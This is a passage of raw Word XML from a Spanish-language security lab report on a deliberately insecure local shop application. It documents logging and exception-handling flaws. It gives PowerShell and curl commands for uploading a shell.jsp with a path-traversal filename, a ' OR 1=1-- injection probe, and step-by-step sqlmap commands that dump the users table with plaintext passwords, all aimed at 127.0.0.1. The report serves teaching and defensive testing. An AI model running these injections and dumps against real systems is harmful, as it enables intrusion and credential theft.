        <w:t xml:space="preserve">Réplica en PowerShell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 Requiere PowerShell 7+ para -Form; en PowerShell 5.1 usar curl.exe (ver alternativa abajo)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">"contenido de prueba" | Out-File -FilePath .\shell.jsp -Encoding ascii</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/productos/1/imagen" -Method Post -Form @{ archivo = Get-Item .\shell.jsp }</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Alternativa universal (PowerShell 5.1 o 7+) usando curl.exe:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>curl.exe -X POST "http://127.0.0.1:8080/api/productos/1/imagen" -F "archivo=@shell.jsp"</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Prueba de Path Traversal en el nombre de archivo</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>curl.exe -X POST "http://127.0.0.1:8080/api/productos/1/imagen" -F "archivo=@shell.jsp;filename=../../evidencia-traversal.txt"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El servidor acepta el archivo .jsp sin rechazarlo por tipo o extensión, y lo guarda con el nombre exacto enviado por el cliente. El segundo caso demuestra que un nombre de archivo con ../../ puede escribir fuera de la carpeta uploads/ prevista.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A09 — Security Logging and Alerting Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LegacyLogger registra en los logs de la aplicación el usuario y la contraseña en cada intento de login (loginIntento), sin enmascarar datos sensibles, sin diferenciar niveles de severidad para eventos de seguridad y sin ninguna integración con un sistema de alertas o SIEM que permita detectar patrones de fuerza bruta como el de la sección A07.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: util/LegacyLogger.java · config/SecurityConfig.java (credenciales admin impresas al iniciar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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Inspección de logs del contenedor (no es un endpoint HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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 Ver en vivo los logs del backend mientras se ejecuta el ataque de fuerza bruta de la sección A07</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose logs -f backend</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Filtrar únicamente las líneas de auditoría con credenciales en texto plano</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose logs backend | Select-String -Pattern "password=|Usuario admin semilla"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En los logs aparecen líneas como "Intento de login -&gt; usuario='admin' password='123456'" para cada intento del ataque de fuerza bruta anterior, y al inicio del contenedor se ve impresa la contraseña del usuario admin semilla en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A10 — Mishandling of Exceptional Conditions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GlobalExceptionHandler captura cualquier excepción no controlada y responde al cliente con la clase exacta de la excepción, el mensaje interno y el stacktrace completo en formato JSON, revelando detalles internos (nombres de clases, fragmentos de SQL, rutas de archivos) que facilitan otros ataques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: exception/GlobalExceptionHandler.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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GET /api/productos/{id} con un id no numérico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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 Forzar una excepción enviando un id no numérico donde se espera un valor numérico</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">try {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/productos/' OR 1=1--"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">} catch {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    $_.ErrorDetails.Message</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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Alternativa mostrando el cuerpo completo del error 500</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>curl.exe -s "http://127.0.0.1:8080/api/productos/' OR 1=1--"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La respuesta HTTP 500 incluye en el cuerpo JSON el campo "stacktrace" con la traza completa de Java, exponiendo la sentencia SQL generada internamente y el paquete/clase donde ocurrió el fallo — información que en un ataque real aceleraría notablemente el descubrimiento de la vulnerabilidad de inyección SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">10. SQL Injection automatizado con sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta sección documenta el requisito específico de automatizar el descubrimiento de las credenciales de acceso mediante sqlmap contra el endpoint vulnerable de búsqueda de productos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Instalación de sqlmap en Windows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pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Opción 1: vía pip (requiere Python 3 instalado)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install sqlmap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">sqlmap --version</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Opción 2: binario oficial</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># Descargar desde https://github.com/sqlmapproject/sqlmap/archive/master.zip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"># y ejecutar: python sqlmap.py --version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 1 — Confirmar la inyección y listar las bases de datos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r>
              <w:t>sqlmap -u "http://127.0.0.1:8080/api/productos/buscar?q=test" -p q --batch --dbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 2 — Listar las tablas de la base de datos tienda_insegura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r>
              <w:t>sqlmap -u "http://127.0.0.1:8080/api/productos/buscar?q=test" -p q --batch -D tienda_insegura --tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 3 — Volcar la tabla usuarios (credenciales de acceso)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r>
              <w:t>sqlmap -u "http://127.0.0.1:8080/api/productos/buscar?q=test" -p q --batch -D tienda_insegura -T usuarios --dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como el parámetro q se concatena sin sanear dentro de una cláusula LIKE (ver ProductRepositoryJdbc.buscarPorNombre), sqlmap detecta automáticamente el punto de inyección (boolean-based blind y, según la configuración de PostgreSQL, también UNION-based) y extrae fila por fila el contenido completo de la tabla usuarios, incluidas las columnas username y password en texto plano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 4 (opcional) — Volcado dirigido a columnas específicas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r>
              <w:t>sqlmap -u "http://127.0.0.1:8080/api/productos/buscar?q=test" -p q --batch -D tienda_insegura -T usuarios -C username,password,role --dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 5 (opcional) — Nivel y riesgo más agresivos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r>
              <w:t>sqlmap -u "http://127.0.0.1:8080/api/productos/buscar?q=test" -p q --batch --flush-session --level=3 --risk=2 -D tienda_insegura -T usuarios --dump</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6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Aumentar --level y --risk incrementa el número de payloads probados y el tiempo de ejecución; útil si el punto de inyección no se confirma con la configuración por defecto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap debe reportar el parámetro "q" como inyectable, identificar el motor como PostgreSQL, y al finalizar el --dump mostrar en la consola (y guardar en un CSV bajo la carpeta de salida de sqlmap, por defecto %USERPROFILE%\.local\share\sqlmap\output\localhost\ o %APPDATA%\sqlmap\output según la versión) una tabla con las filas de usuarios: id, username, email, password (texto plano), full_name, role y created_at — cumpliendo el objetivo de descubrir de forma automatizada las credenciales de acceso a la aplicación.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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidencia a capturar: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Guardar como evidencia la salida completa de la consola del Paso 3 (--dump) junto con el archivo CSV generado por sqlmap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Conclusiones y hacia la versión 2 (saneada)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
